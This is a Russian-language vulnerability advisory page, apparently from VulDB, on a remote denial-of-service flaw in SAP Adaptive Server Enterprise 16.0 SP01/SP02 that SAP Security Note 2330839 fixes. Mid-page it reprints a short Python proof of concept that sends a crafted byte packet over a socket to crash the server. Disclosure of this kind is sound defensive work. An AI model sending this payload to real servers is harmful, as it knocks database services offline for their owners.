SAP Adaptive Server Enterprise 16.0 SP01/16.0 SP02 отказ в обслуживании

CVSS Meta Temp Score	Текущая цена эксплойта (≈)	Балл интереса CTI
4.6	$0-$5k	0.00

СводкаИнформация

Уязвимость была найдена в SAP Adaptive Server Enterprise 16.0 SP01/16.0 SP02 и классифицирована как проблематичный. Неизвестная функция поражена. Манипуляция приводит к отказ в обслуживании. Также существует доступный эксплойт. Рекомендуется установить обновление для решения этой проблемы.

ПодробностиИнформация

Уязвимость была найдена в SAP Adaptive Server Enterprise 16.0 SP01/16.0 SP02 и классифицирована как проблематичный. Неизвестная функция поражена. Манипуляция приводит к отказ в обслуживании. Использование классификатора CWE для обозначения проблемы ведет к CWE-404. Слабость была опубликована 12.07.2016 специалистом Vahagn Vardanyan под идентификатором Security Note 2330839 как Mailinglist Post (Full-Disclosure). Консультацию можно прочитать на сайте seclists.org.

Техническая информация не предоставлена. Популярность этой уязвимости ниже среднего. Также существует доступный эксплойт. Эксплойт доступен широкой публике и может быть использован. Сейчас цена на эксплойт приблизительно равна USD $0-$5k.

Указано значение Доказательство концепции. Эксплойт можно загрузить по адресу seclists.org. Уязвимость рассматривалась как непубличный эксплойт нулевого дня в течение как минимум 162 дней. В статусе 0-day примерная стоимость на черном рынке была около $5k-$25k. Пример кода эксплойта:

PoC = "\xe2\xf3\x00\x9d\x80\x8e\xf3\xa0" \
     "\x80\xb4\x00\x81\xb0\x00\x00\x93" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x31\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x34\x31\x30\x35\x37\x32" \
     "\x37\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00\x00\x00\x00\x00\x00\x00\x00" \
     "\x00"

s = socket.socket()
s.settimeout(1)
s.connect((SERVER_IP, SERVER_PORT))
s.send(PoC)
print(PoC)
s.close()

Патч называется Security Note 2330839. Рекомендуется установить обновление для решения этой проблемы.

ПродуктИнформация

Поставщик

• SAP

Имя

• Adaptive Server Enterprise

Версия

• 16.0 SP01
• 16.0 SP02

Лицензия

• коммерческий

Веб-сайт

• Поставщик: https://www.sap.com/

CPE 2.3Информация

• 🔍
• 🔍

CPE 2.2Информация

• 🔍
• 🔍

CVSSv4Информация

VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.6

VulDB Базовый балл: 5.3
VulDB Временная оценка: 4.6
VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv2Информация

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

Вектор	Сложность	Аутентификация	Конфиденциальность	Целостность	Доступность
Разблокировать	Разблокировать	Разблокировать	Разблокировать	Разблокировать	Разблокировать
Разблокировать	Разблокировать	Разблокировать	Разблокировать	Разблокировать	Разблокировать
Разблокировать	Разблокировать	Разблокировать	Разблокировать	Разблокировать	Разблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍

ЭксплуатацияИнформация

Класс: отказ в обслуживании
CWE: CWE-404
CAPEC: 🔍
ATT&CK: 🔍

Физический: Нет
Локальный: Нет
Удалённый: Да

Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Автор: Vahagn Vardanyan
Скачать: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍

0-Day	Разблокировать	Разблокировать	Разблокировать	Разблокировать
Сегодня	Разблокировать	Разблокировать	Разблокировать	Разблокировать

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендация: Патч
Статус: 🔍

0-дневное время: 🔍
Задержка эксплуатации: 🔍

Патч: Security Note 2330839

ХронологияИнформация

01.02.2016 🔍
02.02.2016 +1 дни 🔍
12.07.2016 +161 дни 🔍
17.10.2016 +97 дни 🔍
20.10.2016 +3 дни 🔍
14.05.2019 +936 дни 🔍

ИсточникиИнформация

Поставщик: sap.com

Консультация: Security Note 2330839
Исследователь: Vahagn Vardanyan
Статус: Не определено

GCVE (VulDB): GCVE-100-93002
scip Labs: https://www.scip.ch/en/?labs.20150716
Разное: 🔍

ВходИнформация

Создано: 20.10.2016 13:07
Обновлено: 14.05.2019 09:59
Изменения: 20.10.2016 13:07 (50), 14.05.2019 09:59 (1)
Завершенный: 🔍
Cache ID: 216::103

If you want to get best quality of vulnerability data, you may have to visit VulDB.

Обсуждение

Want to know what is going to be exploited?

We predict KEV entries!